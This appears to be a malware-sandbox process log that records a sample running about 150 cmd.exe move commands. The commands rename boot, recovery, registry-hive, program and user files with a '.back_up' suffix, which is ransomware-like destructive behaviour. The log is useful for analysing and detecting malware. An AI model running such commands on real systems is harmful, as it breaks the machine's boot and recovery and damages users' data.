C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files\7-Zip\7-zip.chm""" """C:\\Program Files\7-Zip\7-zip.chm.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files (x86)\desktop.ini""" """C:\\Program Files (x86)\desktop.ini.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Boot\BOOTSTAT.DAT""" """C:\\Boot\BOOTSTAT.DAT.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\vcredist2010_x64.log-MSI_vc_red.msi.txt""" """C:\\vcredist2010_x64.log-MSI_vc_red.msi.txt.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files\CompareRegister.ini""" """C:\\Program Files\CompareRegister.ini.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Boot\da-DK\bootmgr.exe.mui""" """C:\\Boot\da-DK\bootmgr.exe.mui.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\vcredist2010_x64.log.html""" """C:\\vcredist2010_x64.log.html.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Recovery\WindowsRE\boot.sdi""" """C:\\Recovery\WindowsRE\boot.sdi.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Boot\cs-CZ\bootmgr.exe.mui""" """C:\\Boot\cs-CZ\bootmgr.exe.mui.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files\CompleteInvoke.mpeg2""" """C:\\Program Files\CompleteInvoke.mpeg2.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Boot\da-DK\memtest.exe.mui""" """C:\\Boot\da-DK\memtest.exe.mui.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Boot\cs-CZ\memtest.exe.mui""" """C:\\Boot\cs-CZ\memtest.exe.mui.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files\7-Zip\7z.sfx""" """C:\\Program Files\7-Zip\7z.sfx.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files\CompressRestart.zip""" """C:\\Program Files\CompressRestart.zip.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files\7-Zip\7zCon.sfx""" """C:\\Program Files\7-Zip\7zCon.sfx.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files\Common Files\DESIGNER\MSADDNDR.OLB""" """C:\\Program Files\Common Files\DESIGNER\MSADDNDR.OLB.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files\CompleteLimit.reg""" """C:\\Program Files\CompleteLimit.reg.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files\ConfirmDisconnect.mp2""" """C:\\Program Files\ConfirmDisconnect.mp2.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Users\desktop.ini""" """C:\\Users\desktop.ini.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\vcredist2012_x64_0_vcRuntimeMinimum_x64.log""" """C:\\vcredist2012_x64_0_vcRuntimeMinimum_x64.log.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\ReadMe.htm""" """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\ReadMe.htm.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\vcredist2012_x64_1_vcRuntimeAdditional_x64.log""" """C:\\vcredist2012_x64_1_vcRuntimeAdditional_x64.log.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Users\Admin\Contacts\desktop.ini""" """C:\\Users\Admin\Contacts\desktop.ini.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Recovery\WindowsRE\Winre.wim""" """C:\\Recovery\WindowsRE\Winre.wim.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Recovery\WindowsRE\ReAgent.xml""" """C:\\Recovery\WindowsRE\ReAgent.xml.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files\7-Zip\descript.ion""" """C:\\Program Files\7-Zip\descript.ion.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files\ConvertEnable.3gp""" """C:\\Program Files\ConvertEnable.3gp.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files\DebugWatch.m1v""" """C:\\Program Files\DebugWatch.m1v.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\vcredist2013_x64_000_vcRuntimeMinimum_x64.log""" """C:\\vcredist2013_x64_000_vcRuntimeMinimum_x64.log.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files (x86)\Internet Explorer\ie9props.propdesc""" """C:\\Program Files (x86)\Internet Explorer\ie9props.propdesc.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files\7-Zip\History.txt""" """C:\\Program Files\7-Zip\History.txt.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\ENUtxt.pdf""" """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\ENUtxt.pdf.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\vcredist2013_x64_001_vcRuntimeAdditional_x64.log""" """C:\\vcredist2013_x64_001_vcRuntimeAdditional_x64.log.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files\CopyWrite.gif""" """C:\\Program Files\CopyWrite.gif.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files\DenyNew.inf""" """C:\\Program Files\DenyNew.inf.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\vcredist2019_x64_000_vcRuntimeMinimum_x64.log""" """C:\\vcredist2019_x64_000_vcRuntimeMinimum_x64.log.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Boot\et-EE\bootmgr.exe.mui""" """C:\\Boot\et-EE\bootmgr.exe.mui.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\vcredist2019_x64_001_vcRuntimeAdditional_x64.log""" """C:\\vcredist2019_x64_001_vcRuntimeAdditional_x64.log.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files\desktop.ini""" """C:\\Program Files\desktop.ini.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\1494870C-9912-C184-4CC9-B401-A53F4D8DE290.pdf""" """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\1494870C-9912-C184-4CC9-B401-A53F4D8DE290.pdf.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files\ExpandSend.otf""" """C:\\Program Files\ExpandSend.otf.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Boot\fr-FR\bootmgr.exe.mui""" """C:\\Boot\fr-FR\bootmgr.exe.mui.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files\7-Zip\License.txt""" """C:\\Program Files\7-Zip\License.txt.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files\7-Zip\Lang\an.txt""" """C:\\Program Files\7-Zip\Lang\an.txt.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Boot\fr-FR\memtest.exe.mui""" """C:\\Boot\fr-FR\memtest.exe.mui.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files (x86)\Internet Explorer\en-US\hmmapi.dll.mui""" """C:\\Program Files (x86)\Internet Explorer\en-US\hmmapi.dll.mui.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files (x86)\Internet Explorer\en-US\ieinstal.exe.mui""" """C:\\Program Files (x86)\Internet Explorer\en-US\ieinstal.exe.mui.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files (x86)\Mozilla Maintenance Service\updater.ini""" """C:\\Program Files (x86)\Mozilla Maintenance Service\updater.ini.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Boot\es-ES\bootmgr.exe.mui""" """C:\\Boot\es-ES\bootmgr.exe.mui.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files\7-Zip\readme.txt""" """C:\\Program Files\7-Zip\readme.txt.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files\DismountWatch.xlt""" """C:\\Program Files\DismountWatch.xlt.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files\7-Zip\Lang\ast.txt""" """C:\\Program Files\7-Zip\Lang\ast.txt.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files\7-Zip\Lang\ar.txt""" """C:\\Program Files\7-Zip\Lang\ar.txt.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Users\Admin\NTUSER.DAT""" """C:\\Users\Admin\NTUSER.DAT.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Users\Admin\ntuser.dat.LOG1""" """C:\\Users\Admin\ntuser.dat.LOG1.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files\7-Zip\Lang\af.txt""" """C:\\Program Files\7-Zip\Lang\af.txt.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Boot\ko-KR\bootmgr.exe.mui""" """C:\\Boot\ko-KR\bootmgr.exe.mui.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files\7-Zip\Lang\az.txt""" """C:\\Program Files\7-Zip\Lang\az.txt.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Users\Admin\ntuser.dat.LOG2""" """C:\\Users\Admin\ntuser.dat.LOG2.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files (x86)\Internet Explorer\en-US\iexplore.exe.mui""" """C:\\Program Files (x86)\Internet Explorer\en-US\iexplore.exe.mui.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Users\Admin\NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TM.blf""" """C:\\Users\Admin\NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TM.blf.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Boot\ko-KR\memtest.exe.mui""" """C:\\Boot\ko-KR\memtest.exe.mui.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Boot\es-ES\memtest.exe.mui""" """C:\\Boot\es-ES\memtest.exe.mui.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files\JoinUninstall.lock""" """C:\\Program Files\JoinUninstall.lock.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Boot\es-MX\bootmgr.exe.mui""" """C:\\Boot\es-MX\bootmgr.exe.mui.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Users\Admin\NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000001.regtrans-ms""" """C:\\Users\Admin\NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000001.regtrans-ms.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files\7-Zip\Lang\ba.txt""" """C:\\Program Files\7-Zip\Lang\ba.txt.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files\LimitRemove.png""" """C:\\Program Files\LimitRemove.png.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Boot\el-GR\bootmgr.exe.mui""" """C:\\Boot\el-GR\bootmgr.exe.mui.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Users\Admin\ntuser.ini""" """C:\\Users\Admin\ntuser.ini.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Boot\de-DE\bootmgr.exe.mui""" """C:\\Boot\de-DE\bootmgr.exe.mui.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\ProgramData\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft Office 16 Click-to-Run Extensibility Component.swidtag""" """C:\\ProgramData\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft Office 16 Click-to-Run Extensibility Component.swidtag.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files\7-Zip\Lang\be.txt""" """C:\\Program Files\7-Zip\Lang\be.txt.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Users\Admin\NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000002.regtrans-ms""" """C:\\Users\Admin\NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000002.regtrans-ms.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files\LockPublish.fon""" """C:\\Program Files\LockPublish.fon.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\ProgramData\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft Office 16 Click-to-Run Licensing Component.swidtag""" """C:\\ProgramData\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft Office 16 Click-to-Run Licensing Component.swidtag.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Boot\el-GR\memtest.exe.mui""" """C:\\Boot\el-GR\memtest.exe.mui.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Boot\de-DE\memtest.exe.mui""" """C:\\Boot\de-DE\memtest.exe.mui.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files\7-Zip\Lang\bg.txt""" """C:\\Program Files\7-Zip\Lang\bg.txt.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files\7-Zip\Lang\bn.txt""" """C:\\Program Files\7-Zip\Lang\bn.txt.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files\7-Zip\Lang\br.txt""" """C:\\Program Files\7-Zip\Lang\br.txt.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\ProgramData\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft Office 16 Click-to-Run Localization Component.swidtag""" """C:\\ProgramData\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft Office 16 Click-to-Run Localization Component.swidtag.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-H""" """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-H.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\ProgramData\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft_Windows-10-Pro.swidtag""" """C:\\ProgramData\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft_Windows-10-Pro.swidtag.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\AcroRdrDCUpd1901020069.msp""" """C:\\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\AcroRdrDCUpd1901020069.msp.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\abcpy.ini""" """C:\\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\abcpy.ini.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-V""" """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-V.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files\7-Zip\Lang\ca.txt""" """C:\\Program Files\7-Zip\Lang\ca.txt.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files\7-Zip\Lang\co.txt""" """C:\\Program Files\7-Zip\Lang\co.txt.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files\PingGroup.htm""" """C:\\Program Files\PingGroup.htm.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files\ReadStop.eprtx""" """C:\\Program Files\ReadStop.eprtx.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files\ReceiveFormat.M2V""" """C:\\Program Files\ReceiveFormat.M2V.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\AcroRead.msi""" """C:\\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\AcroRead.msi.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files\7-Zip\Lang\cy.txt""" """C:\\Program Files\7-Zip\Lang\cy.txt.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\Data1.cab""" """C:\\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\Data1.cab.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files\7-Zip\Lang\cs.txt""" """C:\\Program Files\7-Zip\Lang\cs.txt.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files\RegisterConfirm.M2V""" """C:\\Program Files\RegisterConfirm.M2V.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice-install.log""" """C:\\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice-install.log.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp""" """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Adobe.Reader.Dependencies.manifest""" """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Adobe.Reader.Dependencies.manifest.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files\7-Zip\Lang\da.txt""" """C:\\Program Files\7-Zip\Lang\da.txt.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files\7-Zip\Lang\de.txt""" """C:\\Program Files\7-Zip\Lang\de.txt.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\ProgramData\Microsoft OneDrive\setup\refcount.ini""" """C:\\ProgramData\Microsoft OneDrive\setup\refcount.ini.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files\7-Zip\Lang\el.txt""" """C:\\Program Files\7-Zip\Lang\el.txt.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.ini""" """C:\\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.ini.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Boot\fr-CA\bootmgr.exe.mui""" """C:\\Boot\fr-CA\bootmgr.exe.mui.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Boot\hr-HR\bootmgr.exe.mui""" """C:\\Boot\hr-HR\bootmgr.exe.mui.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Users\Admin\Music\ApproveMove.mp3""" """C:\\Users\Admin\Music\ApproveMove.mp3.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Boot\Fonts\chs_boot.ttf""" """C:\\Boot\Fonts\chs_boot.ttf.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Boot\en-GB\bootmgr.exe.mui""" """C:\\Boot\en-GB\bootmgr.exe.mui.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Boot\hu-HU\bootmgr.exe.mui""" """C:\\Boot\hu-HU\bootmgr.exe.mui.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files\7-Zip\Lang\en.ttt""" """C:\\Program Files\7-Zip\Lang\en.ttt.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Boot\hu-HU\memtest.exe.mui""" """C:\\Boot\hu-HU\memtest.exe.mui.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files\RestartConvertTo.pptm""" """C:\\Program Files\RestartConvertTo.pptm.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files\RestoreConnect.pcx""" """C:\\Program Files\RestoreConnect.pcx.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\CourierStd-Bold.otf""" """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\CourierStd-Bold.otf.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files\7-Zip\Lang\es.txt""" """C:\\Program Files\7-Zip\Lang\es.txt.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Boot\Fonts\cht_boot.ttf""" """C:\\Boot\Fonts\cht_boot.ttf.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files\7-Zip\Lang\eo.txt""" """C:\\Program Files\7-Zip\Lang\eo.txt.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Boot\Fonts\jpn_boot.ttf""" """C:\\Boot\Fonts\jpn_boot.ttf.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Users\Admin\Music\ApproveSave.odt""" """C:\\Users\Admin\Music\ApproveSave.odt.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Boot\Fonts\kor_boot.ttf""" """C:\\Boot\Fonts\kor_boot.ttf.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\AdobePiStd.otf""" """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\AdobePiStd.otf.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files\Common Files\Services\verisign.bmp""" """C:\\Program Files\Common Files\Services\verisign.bmp.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files\7-Zip\Lang\et.txt""" """C:\\Program Files\7-Zip\Lang\et.txt.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files\SearchSync.midi""" """C:\\Program Files\SearchSync.midi.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\CourierStd-BoldOblique.otf""" """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\CourierStd-BoldOblique.otf.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files\7-Zip\Lang\eu.txt""" """C:\\Program Files\7-Zip\Lang\eu.txt.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\CourierStd-Oblique.otf""" """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\CourierStd-Oblique.otf.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Boot\Fonts\malgunn_boot.ttf""" """C:\\Boot\Fonts\malgunn_boot.ttf.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Users\Admin\Music\CloseInstall.mht""" """C:\\Users\Admin\Music\CloseInstall.mht.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files\7-Zip\Lang\ext.txt""" """C:\\Program Files\7-Zip\Lang\ext.txt.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AGMGPUOptIn.ini""" """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AGMGPUOptIn.ini.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files\7-Zip\Lang\fa.txt""" """C:\\Program Files\7-Zip\Lang\fa.txt.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files\SkipStep.dotx""" """C:\\Program Files\SkipStep.dotx.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\CourierStd.otf""" """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\CourierStd.otf.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Boot\Fonts\malgun_boot.ttf""" """C:\\Boot\Fonts\malgun_boot.ttf.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Users\Admin\Music\ConnectSelect.cr2""" """C:\\Users\Admin\Music\ConnectSelect.cr2.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Boot\it-IT\bootmgr.exe.mui""" """C:\\Boot\it-IT\bootmgr.exe.mui.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files\7-Zip\Lang\fi.txt""" """C:\\Program Files\7-Zip\Lang\fi.txt.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Boot\Fonts\meiryon_boot.ttf""" """C:\\Boot\Fonts\meiryon_boot.ttf.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateHelper.msi""" """C:\\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateHelper.msi.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files\7-Zip\Lang\fr.txt""" """C:\\Program Files\7-Zip\Lang\fr.txt.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\MinionPro-Bold.otf""" """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\MinionPro-Bold.otf.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Boot\updaterevokesipolicy.p7b""" """C:\\Boot\updaterevokesipolicy.p7b.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files\SplitEnter.7z""" """C:\\Program Files\SplitEnter.7z.back_up"""4⤵
-
